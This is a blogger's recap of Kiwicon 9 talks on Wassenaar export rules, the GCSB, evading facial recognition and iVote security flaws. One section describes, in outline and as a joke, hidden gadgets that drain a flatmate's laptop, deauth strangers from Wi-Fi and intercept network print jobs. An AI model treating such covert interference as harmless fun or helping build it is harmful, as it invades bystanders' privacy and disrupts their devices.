Kiwicon 9 Day 2 Morning

Another glorious day in the Cyber Corps! A day in the Cyber Corps is like a day on the server farm. Every meal’s a banquet! Every paycheck a fortune! Every formation a parade! I LOVE the Cyber Corps!

Opening Matters - Friday - Metlstorm @ The St James Theatre

Apparently hacker re-education camp is harder than you’d think. Well, that’s what Metl mumbled as he dragged himself up onto stage with a nice, fresh flesh wound covering half his face.

Metl explained that the keynote speaker had once been “one of us” but she, too, now was reformed, doing policy, and being “the most boring woman in the world.”

Talk: Swinging From the Cyberlier: How to Hack Like Tomorrow Doesn’t Exist Without Flying Sideways of Regulations

Katie Moussouris

Apparently being the most boring world involves being lowered from the ceiling on a ring. Wearing LED hair extensions. Singing. While gold lycra clad dancers perform an interpretation of your music below, with smoke, laser lights, and flames belching from the stage.

I think I’m going to order myself some boring from the Boring Factory. Because that was a spectacle that left me somewhere between hysterics and slack-jawed amazement.

Katie told is a bit about herself; she used to be a hands-on hacker and was the creator of Microsoft’s Bug Bounty program back when (a) Microsoft were trying to get serious about security and (b) big corporates having a bug bounty program was still a big novel. Over time she has shifted into policy land - “fighting for your right to party at ring 0” - which involves a lot of talking and lobbying. As an aside, she noted that she turned down a trip to the White House to make Kiwicon.

Policy? What?

Katie gave a bit of an overview of how policy - and ultimately treaties and laws - are made; people will come up with vague goals, and policy analysts (“I did not know this was a thing you could study at university”) will then work through how these goals can be met; some require treaties, some require law changes, and some may simply require directives to government departments. A key point, noted Katie, is that while policy analysts are experts at turning goals into outcomes they generally lack detailed technical knowledge in any particular field. As such, they lean havily on who is prepared to spend time and energy offering guidance on the finer points of how this shit works.

Which is where Katie (now) comes in. Because the alternative is to leave it up to lobbyists who might not be so friendly.

The Wassenar Problem

The Wassenar treaty is a multilateral arms trading treaty. It’s intended to limit the proliferation of various types of physical weaponry, both in terms of what gets sold, and to who. A cynic would note that however laudible the treaty’s goals you’ll note that Saudi Arabia has a whole bunch of cutting-edge millitary tech, which would tend to make one rather question whether it’s a bit like the arms embargo of the Spanish Civil War1.

But I digress. The intent of Wassenar is certainly well-meaning. More guns do not, whatever Heinlein told you, lead to a politer society, they just lead to a lot more dead people, and chemical weapons just make everything more awful. These seem like logical sorts of things to regulate, so it might seem a little odd that in 2013 the Wassenar countries agreed to add “intrusion software and techniques” to the list of controlled items.

As with much of Wassenar there were good reasons for this: consider the example of prized vile shitbags Hacking Team, a collection of feculent Italians who are very proud of selling tools and expertise to the vilest regimes around (if they can pay) to hunt down dissidents at home and abroad in order to facilitate the kidnapping, torture, and murder thereof. It would not be a bad thing to make it difficult or impossible for this sort of trade to occur.

So the intent of the 2013 changes was to protect people from evil governments and sociopathic monsters. So far, so good.

The Devil is in the Details

Like most international treaties and agreements, Wassenar does not mandate detailed approaches to the implementation of its goals; signatory governments are expected to introduce domestic rules and legislation to move into compliance with Wassenar directives. Some countries already have (more on that later) and in 2015 the United States began to work on the changes it would introduce. Because the policy wonks recognised this was an area that might make waves, and is an area they don’t have a lot of specific knowledge, they took an unprecedented (and laudible) step: the opened up the process to public comments, something which had never been done before.

All hell broke loose.

There was a lot of feedback, a huge amount of which was unfortunately trolly. Of the serious stuff, though, were concerns that the rules would lead to absurd situations, criminalise a huge amount of things that shouldn’t be, and quite possibly not solve the problem being aimed at.

Intent vs Execution

So the intent was laudable: keep stuff away from, say, Syria. But the rules as envisaged would have ciminalised research and defensive tools. Some examples of perverse outcomes that weren’t intended:

  • Employees of different nationalities working in the United States, for a United States company, wouldn’t be able to walk down the hallway and talk to one another about a vulnerability - a US citizen talking to a New Zealand citizen, both employed by Oracle, working in San Francisco, would be a serious criminal offence.
  • Bug bounty programs would be effectively criminalised.
  • Multi-use tools would be criminalised under the worst assumption.

There are exceptions to the rules; for example, if you’re going to publish publicly, or sharing with other researchers, or sending to a single vendor who will publish patches, you’re clean. But there are still many problems with these: Oracle, for example, have a laundry list of WONTFIX security bugs in the Oracle DB. If you send them a notice and they decide not to patch, you’re (potentially) an arms smuggler.

Worse still, the exemptions don’t really have language that allows for things like co-ordinated multi-vendor releases - who’s the vendor for the Heartbleed or (many) Xen bugs? Because there’s no real defined process for dealing with something that has many vendors, and many downstream dependencies.

But worst of all is that the exemptions are a process that requires researchers talk to the government. There are litterally scores of serious security vulnerabilites published a day - Katie asked rhetorically if anyone really believed that they could keep up with the rate of requests involved - the idea is completely unworkable!

What is to be done?

Katie’s work has revolved around educating the policy teams in this space about these sorts of problems, and helping them work towards a better framework. She views this as particularly critical for the United States, since when the 800lb gorilla chooses to implement a treaty in a particular way, it will tend to become the de-facto standard; many countries will simply crib the US implementation for their own, and even if they don’t, the strength of the US in the global market means companies and govenments will tend to treat US compliance rules as a must-do simply to be able to do business there.

Katie believes that as well as the problems identified above, the language referring to “intrusion technology” and “intrustion techniques” are the key elements to target; this is because it moves the scope of the Wassenar treaty from dealing with specific tools to whole categories of research and activity in a way that makes it practical for researchers to avoid breaching the rules.

Katie also noted that some countries have implemented more workable versions of the basic Wassenar protocol - “Yay Australia!”, which is something not often said about Aussie governments and computers in the last decade - and people should encourage this to continue. There are regular Wassenaar updates, so this isn’t a settled issue; keeping on top of them and providing feedback to governments is critical to keeping the agreements sane and workable.

Closing

“Keep yourself and your friends out of jail. The world needs you.”

Talk: Building the Internet of Wrongs

Steve Lord

Steve kicked off his talk by warning that he’s a “horrible cunt” and might breach the code of conduct. Well, um.

He then swung serious for a moment, to explain part of his motivation for visiting New Zealand was to try to track down an old friend who had disappeared without trace, and appealed for anyone who’d seen his mate to let him know. Which is a more somber start than most talks.

That out of the way, Steve kicked on the with main body of his talk, introducing us to SmartPlate: SmartPlate is backed by Science! SmartPlate is, of course, a perfect example of the Internet of Things: cheap, shitty hardware and software pointlessly crammed onto an otherwise functional device to do… not much useful. Can we apply, Steve asks, the same principles to the Internet of Wrongs? Instead of the alphabet soup agencies spending billions on intercept and intereference capabilities, what happens if we decide to fuck shit up with cheap crap?

Shitweasel

Past operation in Berlin. A burned-out pen tester/comedian in Berlin trolls a Mac-loving German hipster; Steve was staying with a mate in Berlin while working on the comedy circut. And Steve’s mate’s flatmate loved his Mac because of its battery life.

Steve, apparently, doesn’t much like Macs or their owners, so decided to have a little fun at the expense of his temporary flatmate. Shitweasel was born of taking an Arduino board with an 802.11 module. A little code then sends wake on lan packets crafted to wake a Mac. As a result, the Mac never enters a sleep state, and runs down bizarrely quickly, draining “its power and the smug from the annoying flatmate”.

After hiding the device in a cupboard, Steve chortled happily at the flatmate’s bemusement.

Left running for 6 months. Whoops.

“Oh, I see you’ve got a Dell.”

“Ja, I had a horrible experience with Apple Customer Support.”

Apparently the unfortunate victim of Steve’s ire had tried getting his apparently faulty fast-draining laptpo fixed by Apple who had, obviously, been unable to find anything wrong with it. Enraged, he had swapped his Apple for a Dell. Steve found this tremendously amusing.

Thunderblade

“If you’re having fun and you don’t take a picture you weren’t really there.”

It turns out Mac users aren’t the only people Steve doesn’t like. He’s not best pleased by “hipsters” (who, like pornography, we know when we see), and their habits of taking photos of everything. Steve is tired of seeing photos of people’s food and their selfies. What can he do about this? With, say, a Rasberry Pi and an ethernet card that can do injecion?

Scan an open AP for DNS requests via pcap. Check for keywords - Twitter, Instagram, what have you.

Then simply boot the client from the AP via deauth. Which is, I guess, a thing to do if your fun is ruining other people’s fun.

Putaprint

Based on OpenWRT.

Uses the Vortex IDS and xpipes. Uses Vortex to scan various printing ports for lp, ipp, and so on. Once they’re found, streams are sniffed and copied, then attached to a delivery mechanism (like email), where, with a little tidy-up (removing the print commands in the header, for example), they arrive as PCL files that can be viewed in your inbox. Ever wanted to know what people are printing? Now you do!

Retrospective

For less than 50 bucks a pop, we can deny access and intercept sensitive documents, even it’s junk.

Malicious junk hacking is fun (for a certain sort of person).

These toys suck. Remwmber there are toys which do not.

Talk: REDACTED

The first redacted talk was for fun. This one is a little more serious.

Metl told the story of the time that someone, somewhere, was fiddling with something, and well, they had to make a call. “Someome accidentally your zone file. Have you considered not outsourcing it?” To the GCSB.

Well that escalated quickly

Which leads us to the identity of the speaker for this section: Una Jagose, Acting Director, GCSB

“It’s funny coming out for an organisation. I did it personally years ago, and it turns out the techniques are the same.”

Una has been the acting head while a new long-term appointment is found; she comes from outside the GCSB, and has been very impressed by the quality of the people she’s been working with there.

The job of the GCSB is foreign intelligence, supporting other agencies, and information assurance and security.

They work with the public and private sectors, including Cortex (more about that later). A key role is reporting and co-ordinating threat response.

There has been an effort to become more outward facing; they are trying to stay focused on the more serious end of the spectrum; ransomware, financial threats, compromisimg government attacks.

Information about detected attacks will be passed on to targetted organisations or individuals, and assistance offered.

Cortex

Active and passive threat detection tools above and beyond commercially available tooling. Available to critical financial, infrastructure, etc targets.

The organisation must consent to the use of Cortex, there must be ministerial consent, and a warrant (it wasn’t clear whether this is publicised; it’s also worth noting the minister is generally the Prime Minister which is a general structural problem with the oversight of our intelligence agencies).

The organisation must keep the use of Cortex confidential (in other words, if your ISP, power company, or bank is using it, they can’t tell you; they probably can’t even tell their own staff).

The proposed ISP roll out of Cortex (which you won’t know about if you’re an ISP customer, so you can’t select ISPs based on whether they do or don’t use this capability) is not intended to siphon customer traffic.

Overall

Una is a much friendlier face than the plonker from the PM’s department that came along last year, and an infinitely less arrogant speaker. Something she did well to stress repeatedly during her talk was that the remit of the GCSB is, ultimately, a political decision; from her point of view, they operate within the law2, so the best way to address concerns with their role is via the parliamentary process.

She ran a Q&A outside the talks, which was so swamped I didn’t even queue for it. Which is a pity, because I’d like to have heard Una’s response to two questions:

  • How does she think that the oversight of the GCSB could be made more meaningful to give the public confidence that there is no untoward behaviour without unduly compromising their role?
  • What can the GCSB do if their minister - that is, a member of the government - starts using their powers in ways which are lawful but clearly against the intent of the intent of the organisation?

The second point is particularly important; the milltary, for example, have an oath that contains language which superceeds “doing what the government of the day wants” in some cases; the army could legitimatly refuse orders they think conflict with their oath. Are we relying on the integrity of individual members of the GCSB if a minister goes rogue? Or is there some systemic way for the Director to say, “No, this isn’t OK”?

Talk: Face Off - Hiding in Plain Sight

ferrouswheel

Facial recognition and how to mess with them, from a machine learning perspective.

Ecoinformatician, AI, Joel Pitt.

He was responsible for the cycle-powered twirly cylinder at Lux 2015.

Cameras have become ubiquituous, and are never taken away. Newer algorithms are becoming worringly more accurate; they have been used for retrospective action.

There are 1762 council cameras in Auckland alone and there’s a desire to expand. More warrant-free surveillance (since this talk and my notes were taken, the Wellington City Council has started asking for volunteers to monitor the local panopticon; there is so much surveillance it can’t be run by the available number of humans any more).

Recognising people and behaviour might sound like scifi, but it’s here, there are open source tools; check out samim on github.

(Or Sony’s A6xxx series of digital cameras, which feaure “Face Registration”; you can have your consumer camera remember faces to autofocus on in busy scenes, like a party or wedding.)

It’s worth understanding the strengths, weakness, and uses of detection vs recognition; detection is fast, efficient, basic. Recognition needs to be more targeted and has been improving rapidly as compute power and datasets grow. “Labelled Faces in the Wild” is a good sample dataset to understand how things are going.

LFW was only a bit better than random in 2007. Now it’s over 0.95 accurate. Commercial systems are beating people. Haar Cascade is an example of an efficient, modern classifier.

Attack Options

These depend heavily on the problem you’re trying to solve and what the response will be - are you trying to evade detection (not be recognised as a human) or recognition (not be known as a specific human)?

You can’t really attack the training algorithm (used by systems to make decisions about a face) without changing the idea of a human face; you can attack the application’s application - for example, horizontal flipping breaks some systems. You can spam Facebook by attaching your name to random faces (label spam), which will confuse recognition systems, or resort to facial prosthetics (this has been tested on the 25,000 cameras in Chicago, which are centrally tracked).

But these techniques have limits - unknown or conflicting recognition is a flag for further investigation, so you may simply be making yourself a person of interest.

Avoiding detection may be a bigger win. Masks can be good for this, since an automated system won’t see a face - but governments are responding to this by criminalising obscuring your face - you can to prison for ten years in Canada for example3; conversely, in other societies, masks can be acceptable e.g. in Asia for health reasons. Doesn’t help you if you live in Canada, though.

CV Dazzle can defeat detection - fashion and makeup to make it hard to recognise a face. Cover the nose, high contrast mkeup, without it being a breach of the law.

Invisibility glasses: No, really. Reflective, with IR leds; given moar power like a 13 W LED these can render cameras useless for this purpose. Unfortunately they’re kind of obvious for now.

Talk: The New South Wales iVote System: Security Failures and Verification Flaws in a Live Online Election

Vanessa Teague

Voting with ballots were not an accident - it was a response to voter corruption and coercion up to the 19th century. There are two competing systems, transparent count and anonymity.

The French urne électorale is a different implementation but similar system to solve the same problems.

Ceci n’est pas une urne, in 2006, was an early analysis of evoting.

It’s not that voting is insecure - it needs to fulfill the two outcomes of transparency and anonymity. People suggesting we should overhaul our voting systems should probably ground themselves in an understanding of these considerations before dashing to a solution.

iVote

Used by 28,000 people in the NSW elections, 7% of the electorate.

The promise was to allow people to use any device, in any location. Browser side encryption in Javascript, with a return number. Votes are exported to verification server, where the voter uses the return number to hear their vote read in the clear via a telephone call.

Scrutineers cannot see the verification data, so there is no oversite of the third party verification and reconciliatiom processes, breaking transparency. That notwithstanding the electoral comission claimed everything is secure, inaccesible, and allowed verification by the voter.

Except it wasn’t; it turned out that iVote had (and has) serious serious security problems. Votes can be MiTM and the verification process hijacked, so votes can be untraceably altered.

There is no evidence that it was exploited or wasn’t exploited. It is literally impossible to know.

Say that again: There is no evidence that is was exploited or wasn’t exploited.

But the comission continues to claim its perfectly secure.

But it’s not. Calls out to piwik.com for stats analysis, which of course loads a bunch of JavaScript from a third party (allowing who knows what). WTF. Gets an F for SSL from security rating sides. Researchers demoed an actual attack via Freak RSA attack.

The electoral comission spent its time arguing that it couldn’t be a problem. Pity it was vulnerable after logjam.

“It’s one kind of embarrasing to be vulnerable the week before the election. It’s another to run the election while there are vulnerabilities out there.”

The Real Problem

Only 4000 people called the Verification server, so what few claims about transparency could be made can’t really be checked.

Worse yet, the electoral comission has been incredibly evasive about complaints and verification. And no independent report is available, months after the election. The response, even in the week of Kiwicon, was for officials to go on radio interviews and simply claim there was no evidence of a problem.

NZ Opinions

Since Vanessa had come to New Zealand, she thought she’d have a look at the state of things here. She found a requirments doc for NZ. “Must be verifiable end to end” which is an awesome requirement. But it only really exists in the literature as a general case (special cases like helios exist) - there are no practical implementations available.

There are, however, lots of Snake Oil salespeople happy to lie about their products, and a lot of people desperate to say they’ve implemented e-voting.

Even if it exists, can it be practically implemented?

Helios

Helios was a system designed for Victorian elections, dealing with a specific challenge: to allow 1121 Victorian voters residing in London to vote in an election.

You get a receipt at the booth that has a cryptographic copy of your vote.

After the election the crypto is published so you can verify your vote.

Good: You can check your electronic vote, preserving your transparency and anonymity.

Bad: Difficult to understand and field. It’s shiny and new, and not online, so it doesn’t solve the authentication or coercion problem. But it’s a start.

Thoughts

A great speaker, but it was pretty depressing seeing how the push to e-Voting is proceeding with basically zero care for whether it works, and huge hostility to anyone pointing out the problems with it (particularly when there’s basically no clearly articulated set of reasons as to why it might be a good idea). It’s a pity Kiwicon don’t record presentations, because this one should be mandatory watching for anyone thinking that the whole mess is a good idea - including, I might add, various Green and Labour Wellington City Councillors who mocked people raising concerns about their efforts to ram poorly-thought out proposals through.

No, Celia Wade-Brown, people aren’t concerned about e-Voting because they’re racists who want to stop brown people from voting4. They want to stop 4chan and the Russian intelligence services from faking elections. Although, given the way the 2016 presidential election went, I guess they don’t actually need to hack them to win, anyway.


  1. With which the British, for example, refused to sell the Fascists or the Republicans weapons. Which might sound very fair, except the Republicans were the legitimate government fighting a coup by the army, who already had most of the weapons they needed. They ones they didn’t, the Germans loaned them. So the embargo was, in practise, support for the Facist overthrow of the Spanish government. ↩︎

  2. Which sounds nice in theory, but we know that parliament has enacted retrospective legislation to protect the GCSB from the consequences of, well, acting outside the law. ↩︎

  3. I’m guessing this will be prosecuted more often that cases when police, at demonstrations, obscure their identification such as badge numbers. But I’m a bit of a cynic like that. ↩︎

  4. Yes, this was an allegation the former mayor laid at the feet of submitters. Which is the point at which she lost my vote, even if she’d run again. ↩︎

Share